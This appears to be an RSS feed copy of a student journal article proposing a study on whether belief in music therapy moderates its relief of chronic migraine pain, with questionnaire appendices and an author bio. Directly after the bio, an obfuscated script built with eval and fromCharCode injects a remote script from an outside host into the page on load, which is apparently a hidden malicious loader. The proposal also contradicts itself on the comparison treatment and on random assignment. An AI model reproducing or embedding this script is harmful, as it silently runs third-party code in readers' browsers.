<p><strong>Research Hypothesis</strong>: We expect that the efficacy of music therapy, in comparison to a different alternative treatment, in reducing migraine symptoms will be moderated by patients’ beliefs in music therapy’s effectiveness. Specifically, we expect that the relative efficacy of music therapy, in comparison to yoga therapy, in relieving chronic pain symptoms will be greater among individuals who already perceive music therapy as an effective treatment.</p>



<h2 class="wp-block-heading"><strong>Method</strong></h2>



<h4 class="wp-block-heading"><strong>Participants</strong></h4>



<p>Participants will be recruited from a hospital circuit, through compliant doctors asking their patients with chronic migraines. They will be given a small monetary sum, and the study will be conducted in an academic center with music facilities. &nbsp;</p>



<h4 class="wp-block-heading"><strong>Measures</strong></h4>



<p><strong>Belief in Treatment Efficacy. </strong>Prior to being randomly assigned to a treatment condition, patients will fill out a brief survey asking them to report how effective they believe each of the following therapies would be for reducing their migraine symptoms: music therapy, rhythmic class, yoga, mindfulness meditation, traditional western medicine, and pet therapy (Appendix A). Brief descriptions of each therapy type will accompany the items. Participants will indicate their belief in the efficacy of each therapy on a 1 (“Not at All Effective”) to 7 (“Highly Effective”) Likert-type scale. The variable of interest is patients’ beliefs in the efficacy of music therapy, and patients will be told that their beliefs will not affect the treatment condition to which they are assigned.&nbsp;</p>



<p><strong>Treatment Condition. </strong>Patients will be randomly assigned to receive one of two treatments in addition to traditional pharmaceutical treatment: music therapy or rhythmic class This treatment manipulation is similar to one used in previous research (Gutgsell et. al 2013).&nbsp; In each condition, patients will undergo their additional treatment 3 times per week. Patients in the music therapy condition will go into a dark room without distractions for 20 minutes and have a music therapist play harp pieces for them. Patients in the rhythmic class (Bozorg-Nejad et. al 2018) condition will go into a dark room without distractions for 20 minutes and will be taught how to control the various paces of the body with breathing. These conditions will last for 6 weeks.</p>



<p><strong>Improvement of Symptoms. </strong>The dependent variable that will be measured is the difference in pain before treatment and after treatment using a standardized scale. Patients will rate their overall severity of their symptoms at the end of each week on a scale from 0 (“No Symptoms”) to 10 (“Emergency Treatment Necessary”) similar to measures of migraine pain used in previous research (Jensen et. al 1999). Average scores from the final three weeks will be subtracted from average scores from the first three weeks to determine the change in symptoms over the treatment period.</p>



<h4 class="wp-block-heading"><strong>Procedure</strong></h4>



<p>&nbsp;When first agreeing to participate in the study, the participants will complete an informed consent document. They will be given their monetary reimbursement of $50 for their time, and then will be separated into two groups, after being sent and completing the survey about their beliefs in the efficacy of music therapy remotely. From those two groups they will be randomly assigned to either the music therapy condition or the rhythmic class, depending on what time of day they fill out the survey. They will then go to these therapies at least three times per week for 20 minutes for six weeks. Over the course of these six weeks their pain symptoms will be monitored and recorded through their respective nurses on the standardized scale in Appendix B.&nbsp;</p>



<h2 class="wp-block-heading"><strong>Results</strong></h2>



<h4 class="wp-block-heading"><strong>Correlational Analyses</strong></h4>



<p>A zero-order Pearson correlational analysis will be conducted to assess the relationship between belief in the efficacy of music therapy and improvement of pain symptoms for patients in the MT condition only. We hypothesize that, among patients in the MT condition, higher belief in MT will predict more improvement of symptoms. We expect to see a similar correlation between belief in the effectiveness of rhythmic class in the comparison condition.</p>



<h4 class="wp-block-heading"><strong>T-Test</strong></h4>



<p>A t-test will be conducted to compare symptom improvement between the two experimental groups. We expect that without taking into account the patients’ beliefs in MT’s effectiveness that patients in the MT conditional will not show significantly more or less improvement than patients in the rhythmic class condition.&nbsp;</p>



<h4 class="wp-block-heading">&nbsp;<strong>Moderation Analysis</strong></h4>



<p>To test our primary research hypothesis, a moderation analysis will be conducted using the PROCESS macro (Hayes, 2013) Model 1. Treatment condition will be added to the model as the independent variable (x), belief in the efficacy of music therapy as the moderator (w), and symptom improvement as the dependent variable (y). We predict that belief in the efficacy of MT will moderate the difference between treatment groups such that MT will be more effective than rhythmic class among participants with higher beliefs in MT’s efficacy. The conceptual model is illustrated in Figure 1.</p>



<h4 class="wp-block-heading"><strong>Discussion</strong></h4>



<p>The proposed study seeks to explore the relationship between patients’ beliefs in the efficacy of alternative forms of treatment for chronic pain and the actual effectiveness of those treatments. In particular, this study intends to focus on music therapy (MT) as a potential treatment. Patients’ beliefs about MT, and other alternative treatments, will be measured prior to random assignment to a treatment condition that includes typical pharmaceutical treatment plus either music therapy or a comparison treatments condition. It is hypothesized that beliefs in the efficacy of MT will interact with assignment to the MT condition such that patients who perceive MT as more effective and are assigned to the MT condition will experience more pain symptom relief over the course of the study.&nbsp;</p>



<h4 class="wp-block-heading"><strong>Implications</strong></h4>



<p>Approximately 5-12% percent of people worldwide suffer from migraines (MacGregor et. al, 2003), which is millions of people. Therefore, the majority of people at least know someone who is a victim of this kind of pain. Additionally, making strides within the treatment of these migraines could vastly improve quality of life. Music therapy specifically is an instance of alternative methods, based on other facts. If the experimental hypothesis was supported, then pain treatment would be reimagined to adjust to the beliefs of the patient. To ensure the best outcomes, physicians could prescribe whichever alternative treatment an individual patient has the most positive views of in addition to pharmaceutical treatment. Additionally, results that support our hypotheses would suggest that physicians should emphasize scientific support for alternative methods to their patients. Doing so may make beliefs about such treatments more positive, which would in turn make the treatments more effective.</p>



<h4 class="wp-block-heading"><strong>Limitations</strong></h4>



<p>This study would be done on adults, so it probably would not be as conclusive for the same study done on children or adolescents. The proposed study also does not account for potential disparities among those who have chronic migraines. This study also would not discuss the musical aspect involved in rhythm. The proposed study also does not account for the influence of those providing the treatment on the patient’s belief in efficacy. This study also only compares two types of alternative therapies, when there are many others which could have different results.</p>



<h4 class="wp-block-heading"><strong>Future Directions</strong></h4>



<p>In future studies, there should be much deliberation regarding the control therapy and how it relates to music therapy. There could be focus on how different types of music impact the efficacy, or how it relates to what is being treated. . For instance, it has been shown that music can help those with dementia express themselves with language (Brotons &amp; Kroger, 2000). Moreover, connecting these two things is something worth looking into, based on how music has a unique impact on the brain and has helped lessen the impacts of other neurological disorders. As far as pain management goes, it is important to consider the different ways that people can feel pain and how each experience it unique, along with the wide variety of treatment methods- beyond the ones discussed in this proposal.</p>



<h2 class="wp-block-heading"><strong>References</strong></h2>



<p>Bingel, U., Wanigasekera, V., Wiech, K., Mhuircheartaigh, R. N., Lee, M. C., Ploner, M., &amp; Tracey, I. (2011). The effect of treatment expectation on drug efficacy: imaging the analgesic benefit of the opioid remifentanil.&nbsp;<em>Science translational medicine</em>,&nbsp;<em>3</em>(70), 70ra14-70ra14.</p>



<p>Bozorg-Nejad, M., Azizkhani, H., Ardebili, F. M., Mousavi, S. K., Manafi, F., &amp; Hosseini, A. F. (2018). The effect of rhythmic breathing on pain of dressing change in patients with burns referred to ayatollah mousavi hospital.&nbsp;<em>World journal of plastic surgery</em>,&nbsp;<em>7</em>(1), 51.</p>



<p>Brotons, M., PhD, MT-BC, Koger, S. PhD, The Impact of Music Therapy on Language Functioning in Dementia, <em>Journal of Music Therapy</em>, Volume 37, Issue 3, Fall 2000, Pages 183–195, <a href="https://doi.org/10.1093/jmt/37.3.183">https://doi.org/10.1093/jmt/37.3.183</a></p>



<p>Clatworthy, J., Bowskill, R., Rank, T., Parham, R., &amp; Horne, R. (2007). Adherence to medication in bipolar disorder: a qualitative study exploring the role of patients’ beliefs about the condition and its treatment. <em>Bipolar disorders</em>, <em>9</em>(6), 656-664.</p>



<p>de Thurah, A., Nørgaard, M., Harder, I. <em>et al.</em> Compliance with methotrexate treatment in patients with rheumatoid arthritis: influence of patients’ beliefs about the medicine. A prospective cohort study. <em>Rheumatol Int</em> 30, 1441–1448 (2010). <a href="https://doi.org/10.1007/s00296-009-1160-8">https://doi.org/10.1007/s00296-009-1160-8</a></p>



<p>Foulks, E. F., Persons, J. B., &amp; Merkel, R. L. (1986). The effect of patients&#8217; beliefs about their illnesses on compliance in psychotherapy. <em>The American Journal of Psychiatry, 143</em>(3), 340–344. <a href="https://psycnet.apa.org/doi/10.1176/ajp.143.3.340">https://doi.org/10.1176/ajp.143.3.340</a></p>



<p>Gutiérrez, E. O. F., &amp; Camarena, V. A. T. (2015). Music therapy in generalized anxiety disorder. <em>The Arts in Psychotherapy</em>, <em>44</em>, 19-24.&nbsp;</p>



<p>Gutgsell, K. J., Schluchter, M., Margevicius, S., DeGolia, P. A., McLaughlin, B., Harris, M., &#8230; &amp; Wiencek, C. (2013). Music therapy reduces pain in palliative care patients: a randomized controlled trial.&nbsp;<em>Journal of pain and symptom management</em>,&nbsp;<em>45</em>(5), 822-831.</p>



<p>Horne, R. (1999). Patients&#8217; beliefs about treatment: The hidden determinant of treatment outcome?[Editorial]. <em>Journal of Psychosomatic Research, 47</em>(6), 491–495. <a href="https://psycnet.apa.org/doi/10.1016/S0022-3999(99)00058-6">https://doi.org/10.1016/S0022-3999(99)00058-6</a></p>



<p>Jensen, M. P., Turner, J. A., Romano, J. M., &amp; Fisher, L. D. (1999). Comparative reliability and validity of chronic pain intensity measures.&nbsp;<em>Pain</em>,&nbsp;<em>83</em>(2), 157-162.</p>



<p>John, P., Sharma, N., Sharma, C.M. and Kankane, A. (2007), Effectiveness of Yoga Therapy in the Treatment of Migraine Without Aura: A Randomized Controlled Trial. Headache: The Journal of Head and Face Pain, 47: 654-661</p>



<p>Koenig J. Music therapy in the treatment of primary headache disorders. OA Alternative Medicine 2014 Jan 18;2(1):1</p>



<p>Langenberg, M., Frommer, J., &amp; Tress, W. (1995). Music therapy single case research&#8211;a qualitative approach.&nbsp;<em>Psychotherapie, Psychosomatik, medizinische Psychologie</em>,&nbsp;<em>45</em>(12), 418-426.</p>



<p>MacGregor, E. A., Brandes, J., &amp; Eikermann, A. (2003). Migraine prevalence and treatment patterns: the global Migraine and Zolmitriptan Evaluation survey. <em>Headache: The Journal of Head and Face Pain</em>, <em>43</em>(1), 19-26.</p>



<p>Lipton, R. B., Bigal, M. E., Diamond, M., Freitag, F., Reed, M. L., &amp; Stewart, W. F. (2007). Migraine prevalence, disease burden, and the need for preventive therapy.&nbsp;<em>Neurology</em>,&nbsp;<em>68</em>(5), 343-349.</p>



<p>Marks, G., Richardson, J. L., Graham, J. W., &amp; Levine, A. (1986). Role of health locus of control beliefs and expectations of treatment efficacy in adjustment to cancer.&nbsp;<em>Journal of personality and social psychology</em>,&nbsp;<em>51</em>(2), 443.</p>



<p>Munakata, J., Hazard, E., Serrano, D., Klingman, D., Rupnow, M. F., Tierce, J., &#8230; &amp; Lipton, R. B. (2009). Economic burden of transformed migraine: results from the American Migraine Prevalence and Prevention (AMPP) Study.&nbsp;<em>Headache: The Journal of Head and Face Pain</em>,&nbsp;<em>49</em>(4), 498-508.</p>



<p>Oelkers-Ax, R., Leins, A., Parzer, P., Hillecke, T., Bolay, H. V., Fischer, J., &#8230; &amp; Resch, F. (2008). Butterbur root extract and music therapy in the prevention of childhood migraine: an explorative study. <em>European Journal of Pain</em>, <em>12</em>(3), 301-313.</p>



<p>Thaut, M. H. (2010). Neurologic music therapy in cognitive rehabilitation.&nbsp;<em>Music Perception</em>,&nbsp;<em>27</em>(4), 281-285.</p>



<p>Vink, A. C., Bruinsma, M. S., &amp; Scholten, R. J. (2003). Music therapy for people with dementia. <em>Cochrane database of systematic reviews</em>, (4).</p>



<p></p>



<p></p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="324" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/image-1024x324.png" alt="" class="wp-image-1498" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/image-1024x324.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-300x95.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-768x243.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-920x291.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-230x73.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-350x111.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/image-480x152.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/12/image.png 1157w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><meta charset="utf-8">Figure 1. Anticipated Correlation Between Belief in Efficacy and Change in Reported Pain Symptoms</figcaption></figure>



<h4 class="wp-block-heading">Appendix A</h4>



<p>Questionnaire for measuring belief in efficacy of music therapy.</p>



<p>How confident are you in the ability of pet therapy to treat your pain?</p>



<p>&nbsp; 1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 2 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 4&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 7</p>



<p>Not at all&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Extremely&nbsp;</p>



<p>confident&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; confident</p>



<p>How confident are you in the ability of rhythmic classes to treat your pain?</p>



<p>&nbsp; 1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 2 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 4&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 7</p>



<p>Not at all&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Extremely&nbsp;</p>



<p>confident&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; confident</p>



<p>How confident are you in the ability of yoga to treat your pain?</p>



<p>&nbsp; 1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 2 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 4&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 7</p>



<p>Not at all&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Extremely&nbsp;</p>



<p>confident&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; confident</p>



<p>How confident are you in the ability of music therapy to treat your pain?</p>



<p>&nbsp; 1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 2 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 4&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 7</p>



<p>Not at all&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Extremely&nbsp;</p>



<p>confident&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; confident</p>



<p>How confident are you in the ability of traditional western medicine to treat your pain?</p>



<p>&nbsp; 1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 2 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 4&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 7</p>



<p>Not at all&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Extremely&nbsp;</p>



<p>confident&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; confident</p>



<p>How confident are you in the ability of mindfulness meditation to treat your pain?</p>



<p>&nbsp; 1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 2 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 4&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 7</p>



<p>Not at all&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Extremely&nbsp;</p>



<p>confident&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; confident</p>



<h4 class="wp-block-heading">Appendix B</h4>



<p>Measurement of pain</p>



<p>How would you rate your pain symptoms this week??</p>



<p>&nbsp; 1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 2&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 4&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 5&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 7&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 8 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 9&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 10</p>



<p>No symptoms &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Karishma Kulshrestha</h5><p>Karishma is currently a Senior at the Thomas Worthington High School in Ohio. She has a strong passion for people, and her extraverted nature is where this seed was planted. As someone with chronic migraines herself, she has seen a lot of the medical systems from the patient perspective which has allowed her to think about things others might not normally. Karishma is in marching band and was a drum major this year. She also plays volleyball, and started a ski club at her school.

</p></figure></div>



<p></p>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/the-impact-of-belief-in-treatment-methodology-on-the-efficacy-of-music-therapy-in-those-with-chronic-migraines/">The Impact of Belief in Treatment Methodology on the Efficacy of Music Therapy in Those with Chronic Migraines</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Exploring Corticogenesis: Pluripotent Stem Cells into Cerebral Operations</title>
		<link>https://exploratiojournal.com/exploring-corticogenesis-pluripotent-stem-cells-into-cerebral-operations/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=exploring-corticogenesis-pluripotent-stem-cells-into-cerebral-operations</link>
		
		<dc:creator><![CDATA[Harsheel Dhruva]]></dc:creator>
		<pubDate>Mon, 06 Dec 2021 14:30:34 +0000</pubDate>
				<category><![CDATA[Biology]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[cell therapy]]></category>
